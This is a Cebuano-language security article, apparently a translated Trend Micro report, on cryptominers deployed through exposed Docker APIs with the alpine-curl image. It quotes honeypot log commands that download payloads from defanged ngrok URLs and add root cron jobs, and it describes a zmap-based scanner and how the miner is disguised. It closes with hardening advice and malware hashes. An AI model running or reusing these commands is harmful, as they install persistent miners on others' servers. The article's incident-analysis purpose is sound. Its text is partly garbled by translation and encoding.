Among gisusi ang datos nga nakolekta sa mga honeypot containerâkini gihimo alang sa pagmonitor sa mga hulgaâug nakadiskubre og dakong kalihokan gikan sa dili gusto o wala gitugutan nga mga cryptocurrency miner nga gigamit isip mga rogue container gamit ang usa ka imahe sa Docker Hub nga gipatik sa komunidad. Ang imahe gigamit isip kabahin sa usa ka serbisyo nga naghatud sa cryptocurrency mining malware.
Dugang pa, ang mga programa alang sa pagtrabaho sa mga network gi-install aron makasulod sa bukas nga mga kasikbit nga sudlanan ug aplikasyon.
Among gipasagdan ang among mga honeypot nga ingon ana, uban sa ilang default nga mga setting, nga walay bisan unsang mga lakang sa seguridad o sunod nga pag-instalar sa dugang nga software. Palihug timan-i nga ang Docker adunay mga rekomendasyon sa inisyal nga pag-setup aron malikayan ang mga sayup ug yano nga mga kahuyangan. Bisan pa, ang mga honeypot nga among gigamit mga container nga gidisenyo aron makamatikod sa mga pag-atake nga nagtumong sa plataporma sa containerization, dili ang mga aplikasyon sulod sa mga container.
Ang nakitang malisyosong kalihokan talagsaon usab tungod kay wala kini magkinahanglan og mga kahuyangan ug independente sa bersyon sa Docker. Ang pagpangita og sayop nga pagka-configure, ug busa na-expose, nga imahe sa container mao ra ang gikinahanglan sa mga tig-atake aron ma-infect ang daghang na-expose nga mga server.
Ang walay pribilehiyo nga Docker API nagtugot sa tiggamit sa paghimo sa lain-laing mga buluhaton , lakip ang pagkuha og lista sa mga nagdagan nga container, pagkuha og mga log gikan sa usa ka piho nga container, pagsugod, paghunong (lakip ang pagpugos), ug bisan ang paghimo og bag-ong container gikan sa usa ka piho nga imahe nga adunay piho nga mga setting.
Sa wala mao ang pamaagi sa pagpadala sa malware. Sa tuo mao ang palibot sa tig-atake, nga nagtugot sa remote image deployment.
Pag-apod-apod sa 3762 ka publikong Docker API sa nasud. Base sa pagpangita sa Shodan niadtong Pebrero 12, 2019.
Mga variant sa kadena sa pag-atake ug payload
Dili lang ang mga honeypot ang paagi aron makamatikod sa malisyosong kalihokan. Ang datos sa Shodan nagpakita nga ang gidaghanon sa na-expose nga mga Docker API (tan-awa ang ikaduhang tsart) misaka sukad among gisusi ang usa ka sayop nga pagka-configure nga container nga gigamit isip taytayan alang sa pag-deploy sa Monero mining software. Niadtong Oktubre (2018, ang pinakabag-o nga datos anaa) gibanabana. tighubad) adunay 856 lang ka bukas nga mga API.
Usa ka pagsusi sa mga honeypot log nagbutyag nga ang paggamit sa imahe sa sudlanan nalangkit usab sa paggamit sa , usa ka himan para sa pagtukod og luwas nga mga koneksyon o pagpasa sa trapiko gikan sa mga punto nga ma-access sa publiko ngadto sa gitakdang mga adres o mga kapanguhaan (pananglitan, localhost). Gitugotan niini ang mga tig-atake nga dinamikong maghimo og mga URL kung maghatud og mga payload sa usa ka bukas nga server. Sa ubos mao ang mga pananglitan sa code gikan sa mga log nga nagpakita sa pag-abuso sa serbisyo sa ngrok:
Tty: false
Command: â-c curl âretry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d âhxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283â;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp9bedce/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
Tty: false,
Command: â-c curl âretry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d âhxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283â;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp570547/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
Tty: false,
Command: â-c curl âretry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed âhxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4eeâ;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp326c80/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c âcron || crondââ,
Entrypoint: â/bin/shâ,
Tty: false,
Cmd: â-c curl âretry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed âhxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4eeâ;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp8b9b5b/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c âcron || crondââ,
Entrypoint: â/bin/shâSama sa imong makita, ang mga gi-upload nga file gi-download gikan sa kanunay nga nagbag-o nga mga URL. Kini nga mga URL adunay mubo nga petsa sa pag-expire, busa ang mga payload dili ma-download pagkahuman niini ma-expire.
Adunay duha ka kapilian sa payload. Ang una usa ka compiled miner sa ELF format para sa Linux (giila nga Coinminer.SH.MALXMR.ATNO), nga nagkonektar sa mining pool. Ang ikaduha usa ka script (TrojanSpy.SH.ZNETMAP.A), nga gidisenyo aron makakuha og piho nga mga himan sa network nga gigamit sa pag-scan sa mga sakup sa network ug dayon pagpangita og bag-ong mga target.
Ang dropper script nagtakda og duha ka variable nga gamiton sa ulahi aron i-deploy ang cryptocurrency miner. Ang HOST variable naglangkob sa URL diin nahimutang ang mga malisyosong file, ug ang RIP variable mao ang filename (sa tinuod ang hash) sa miner nga i-deploy. Ang HOST variable mausab matag higayon nga mausab ang hash variable. Ang script mosulay usab sa pag-verify nga walay ubang cryptocurrency miner nga nagdagan sa server nga giatake.
Mga ehemplo sa mga variable sa HOST ug RIP, ingon man usa ka snippet sa code nga gigamit aron masusi nga walay ubang mga minero nga nagdagan
Sa dili pa ilunsad ang miner, kini giilisan og ngalan ngadto sa nginx. Ang ubang mga bersyon niini nga script nag-ilis sa ngalan sa miner ngadto sa ubang lehitimong mga serbisyo nga mahimong anaa sa palibot. LinuxKasagaran kini igo na aron malikayan ang mga tseke sa lista sa mga proseso nga nagdagan.
Ang search script adunay kaugalingong talagsaon nga mga bahin. Gigamit niini ang parehas nga serbisyo sa URL aron i-deploy ang mga kinahanglanon nga himan. Naglakip kini sa zmap binary, nga gigamit sa pag-scan sa mga network ug pagkuha og lista sa mga bukas nga port. Ang script nag-download usab og laing binary nga gigamit sa pagpakig-uban sa nadiskobrehan nga mga serbisyo ug pagkuha og mga banner gikan niini aron mahibal-an ang dugang nga impormasyon bahin sa nadiskobrehan nga serbisyo (sama sa bersyon niini).
Ang script nagtino usab daan sa pipila ka network ranges para sa pag-scan, apan kini nagdepende sa bersyon sa script. Nagtino usab kini sa mga target port gikan sa mga serbisyoâsa kini nga kaso, Dockerâsa dili pa ipadagan ang scan.
Kung makit-an na ang mga posibleng target, awtomatikong tangtangon ang mga banner gikan niini. Gisala usab sa script ang mga target base sa mga serbisyo, aplikasyon, sangkap, o plataporma nga gusto niini: Redis, Jenkins, Drupal, MODX, , Docker client 1.16, ug Apache CouchDB. Kon ang usa ka na-scan nga server motakdo sa bisan hain niini, kini maluwas sa usa ka text file, nga magamit sa mga tig-atake sa ulahi alang sa dugang nga pag-analisar ug pag-hack. Kini nga mga text file gi-upload sa mga server sa mga tig-atake pinaagi sa mga dynamic link. Kini nagpasabot nga ang matag file adunay lahi nga URL, nga nagpalisud sa sunod nga pag-access.
Ang attack vector nga gigamit kay usa ka Docker image, sama sa makita sa mosunod nga duha ka code snippets.
Sa ibabaw mao ang pag-ilis sa ngalan ngadto sa usa ka lehitimong serbisyo, ug sa ubos mao kung giunsa paggamit ang zmap sa pag-scan sa mga network.
Sa ibabaw mao ang gitakda nang daan nga mga sakup sa network, sa ubos mao ang piho nga mga pantalan alang sa mga serbisyo sa pagpangita, lakip ang Docker
Ang screenshot nagpakita nga ang alpine-curl nga imahe na-download na og sobra sa 10 milyon ka beses.
Gibase sa Alpine Linux ug ang curl, usa ka himan sa CLI nga episyente sa kahinguhaan para sa pagbalhin sa mga file sa lainlaing mga protocol, mahimong ma-compile Sama sa imong makita sa miaging hulagway, kini nga imahe na-download na og sobra sa 10 milyon ka beses. Kini nga taas nga gidaghanon sa mga pag-download mahimong magpakita nga kini nga imahe gigamit isip entry point; kini nga imahe gi-update kapin sa unom ka bulan ang milabay; ang ubang mga imahe niini nga repository wala kaayo ma-download sa mga tiggamit. Sa Docker â usa ka hugpong sa mga instruksyon nga gigamit sa pag-configure sa usa ka container para sa paglansad. Kon ang entry point dili husto ang pagka-configure (pananglitan, ang container gibiyaan nga naka-expose sa internet), ang imahe mahimong magamit isip usa ka attack vector. Mahimo kining gamiton sa mga tig-atake sa paghatud og mga payload kon makadiskubre sila og usa ka wala gisuportahan, dili husto ang pagka-configure, o naka-expose nga container.
Importante nga matikdan nga kini nga imahe (alpine-curl) mismo dili malisyoso, apan sama sa makita sa ibabaw, magamit kini sa paghimo og malisyoso nga mga gimbuhaton. Ang susamang mga imahe sa Docker magamit usab alang sa malisyoso nga mga katuyoan. Nakigkontak na kami sa Docker ug nakigtambayayong na kanamo bahin niini nga isyu.
rekomendasyon
nagpabilin alang sa daghang mga kompanya, labi na kadtong nagpatuman , nga naka-focus sa paspas nga pag-develop ug paghatud. Kini gipasamot sa panginahanglan sa pagsunod sa mga regulasyon sa pag-audit ug pagmonitor, ang panginahanglan sa pagmonitor sa pribasiya sa datos, ug ang dako nga gasto sa dili pagsunod. Ang paglakip sa automation sa seguridad sa siklo sa kinabuhi sa pag-develop dili lamang makatabang sa pag-ila sa mga lungag sa seguridad nga mahimong dili mamatikdan apan makapakunhod usab sa dili kinahanglan nga mga workload, sama sa pagpadagan sa dugang nga mga software build alang sa matag nakit-an nga kahuyangan o sayop nga pag-configure pagkahuman sa pag-deploy sa aplikasyon.
Ang insidente nga gihisgutan niini nga artikulo nagpasiugda sa panginahanglan nga sulbaron ang seguridad gikan sa sinugdanan, lakip ang mosunod nga mga rekomendasyon:
- Para sa mga administrador sa sistema ug mga developer: Kanunay susiha ang mga setting sa imong API aron masiguro nga kini na-configure aron modawat lamang og mga hangyo gikan sa usa ka piho nga server o internal nga network.
- Sunda ang prinsipyo sa least privilege: siguroha nga ang mga imahe sa container napirmahan ug napamatud-an, limitahan ang pag-access sa mga kritikal nga sangkap (serbisyo sa paglansad sa container), ug i-encrypt ang mga koneksyon sa network.
- Sunda ug pagpaandar sa mga mekanismo sa seguridad, sama sa ug gitukod .
- Gamita ang awtomatikong pag-scan sa mga runtime ug mga imahe aron makakuha og dugang nga impormasyon bahin sa mga proseso nga nagdagan sulod sa usa ka container (pananglitan, aron makamatikod sa spoofing o pagpangita sa mga kahuyangan). Ang pagkontrol sa aplikasyon ug pagmonitor sa integridad makatabang sa pag-ila sa dili normal nga mga pagbag-o sa mga server, file, ug mga lugar sa sistema.
Ang Trendmicro motabang sa mga DevOps team nga luwas nga makatukod, dali nga maka-deploy, ug makadagan bisan asa. Naghatag og gamhanan, na-optimize, ug awtomatiko nga seguridad sulod sa DevOps pipeline sa usa ka organisasyon ug naghatag og daghang paagi aron mapanalipdan batok sa mga hulga. aron mapanalipdan ang pisikal, virtual, ug cloud workloads sa runtime. Nagdugang usab kini og proteksyon sa container gamit ang Đž , nga nag-scan sa mga imahe sa Docker container para sa malware ug mga kahuyangan sa bisan unsang punto sa pipeline sa pag-develop aron malikayan ang mga hulga sa dili pa kini i-deploy.
Mga timailhan sa kompromiso
Mga may kalabutan nga hash:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
sa Ang mga praktikal nga mamumulong magpakita kung unsang mga pag-adjust ang angay unahon aron maminusan ang posibilidad o hingpit nga malikayan ang sitwasyon nga gihulagway sa ibabaw. Ug sa Agosto 19-21, sa online intensive Mahimo nimong hisgutan kini ug ang susamang mga isyu sa seguridad uban sa mga kauban sa trabaho ug mga nagpraktis nga magtutudlo sa usa ka roundtable discussion, diin ang tanan makapahayag sa ilang mga opinyon ug maminaw sa mga kasakit ug kalampusan sa mga eksperyensiyadong kauban sa trabaho.
Source: www.habr.com
